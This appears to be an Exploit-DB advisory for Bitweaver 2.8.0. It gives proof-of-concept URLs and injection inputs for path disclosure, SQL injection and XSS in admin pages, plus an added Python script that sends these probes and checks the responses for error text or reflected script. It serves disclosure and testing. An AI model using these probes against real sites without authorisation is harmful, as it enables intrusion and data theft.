
Bitweaver 2.8.0 - Multiple Vulnerabilities

Author: lemlajt
type: webapps
platform: php
port: 
date_added: 2011-03-02 
date_updated: 2011-03-02 
verified: 0 
codes: OSVDB-71120;OSVDB-71119;OSVDB-71116 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combitweaver2.8.1.zip

# exploit title: Path Disclosure bitweaver 2.8
# date: 25.02.2011
# author: lemlajt
# software : bitweaver
# version: 2.8
# tested on: linux
# cve :
#

Path disclosure in bitweaver 2.8
A single quote as the `page` value of the admin index produces a PHP error that exposes the absolute installation path.
PoC :
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27

SQL injection in bitweaver 2.8
The `find` parameter of the quicktags admin page is placed into a query without proper escaping; a single quote breaks the query and the injected SQL is executed.
PoC :
1. Go to:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc

2. Tamper the request parameters (e.g. with a proxy) and set `find` to a single quote followed by the SQL to inject; the remaining parameters can be left empty:
$find = ' sql
$sort_mode =
$format_guid =
$list_page =


Bonus: XSS
The textarea size settings posted to the admin index are written back into the page without escaping, so a value that closes the attribute can inject script.
POST to:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php
with the parameters:
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>
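The three PoCs above are one-off URLs. The following script is an added example, not part of lemlajt's advisory and not Bitweaver code: it builds the three requests the advisory describes and checks each response for the tell-tale sign of its issue (an absolute .php path in a PHP error for the path disclosure, a database error string for the SQL injection, the unencoded payload echoed back for the XSS). The base URL is the one used in the advisory; sending `find` as a GET parameter, the XSS marker string and the sample responses it is checked against are assumptions and constructed data, so the script runs offline. Pass `http_fetch` instead of `fake_fetch` to run it against a real test install you are authorised to test.

```python
import re
import urllib.parse
import urllib.request

# Base URL as used in the advisory's PoCs.
BASE = "http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver"

# Constructed XSS marker (not the advisory's payload) so reflection is unambiguous.
XSS_MARKER = "<script>bwxss1</script>"

# Absolute *nix path ending in .php, as PHP prints it in warnings
# ("... in /var/www/.../index.php on line 12").
PATH_RE = re.compile(r"(?:/[\w.-]+){2,}\.php\b")

# Generic MySQL/PostgreSQL/driver error strings that surface when quoting breaks a query.
SQL_ERR_RE = re.compile(
    r"You have an error in your SQL syntax|syntax error at or near|mysql_|pg_query", re.I)


def build_probes():
    """One (name, method, url, body) tuple per PoC in the advisory."""
    path_url = BASE + "/kernel/admin/index.php?" + urllib.parse.urlencode({"page": "'"})
    # Assumption: `find` is sent as a GET parameter alongside the two from step 1.
    sqli_url = BASE + "/quicktags/admin/admin_quicktags.php?" + urllib.parse.urlencode(
        {"format_guid": "tikiwiki", "sort_mode": "tagpos_asc", "find": "'"})
    xss_url = BASE + "/kernel/admin/index.php"
    xss_body = urllib.parse.urlencode({
        "liberty_textarea_height": '">' + XSS_MARKER,
        "liberty_textarea_width": '">' + XSS_MARKER,
    }).encode()
    return [
        ("path_disclosure", "GET", path_url, None),
        ("sql_injection", "GET", sqli_url, None),
        ("xss", "POST", xss_url, xss_body),
    ]


def analyze(name, body):
    """Return the evidence found in a response body for the named probe (empty list = nothing)."""
    if name == "path_disclosure":
        return sorted(set(PATH_RE.findall(body)))
    if name == "sql_injection":
        return [m.group(0) for m in SQL_ERR_RE.finditer(body)]
    if name == "xss":
        return [XSS_MARKER] if XSS_MARKER in body else []
    raise ValueError("unknown probe: " + name)


def run_probes(fetch):
    """fetch(method, url, body) -> response text. Returns {probe name: findings}."""
    return {name: analyze(name, fetch(method, url, body))
            for name, method, url, body in build_probes()}


def http_fetch(method, url, body=None, timeout=10):
    """Real transport; only use against a host you are authorised to test."""
    req = urllib.request.Request(url, data=body, method=method)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample responses (not captured from a real Bitweaver install).
SAMPLE_PATH = ("<b>Warning</b>: include('.php): failed to open stream: No such file or "
               "directory in <b>/var/www/bitweaver/kernel/admin/index.php</b> on line <b>12</b>")
SAMPLE_SQLI = ("DB Error: You have an error in your SQL syntax; check the manual that "
               "corresponds to your MySQL server version for the right syntax to use near ''' at line 1")
SAMPLE_XSS = ('<input name="liberty_textarea_height" value=""><script>bwxss1</script>">')


def fake_fetch(method, url, body=None):
    """Offline stand-in for http_fetch that returns the constructed samples."""
    if "admin_quicktags" in url:
        return SAMPLE_SQLI
    if method == "POST":
        return SAMPLE_XSS
    return SAMPLE_PATH


if __name__ == "__main__":
    for probe, findings in run_probes(fake_fetch).items():
        print(probe, "->", findings or "no evidence")
```

The checks are deliberately loose heuristics: an absolute path or SQL error text in the body is strong evidence, but a clean response only means the error was not displayed, not that the input was escaped.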

# *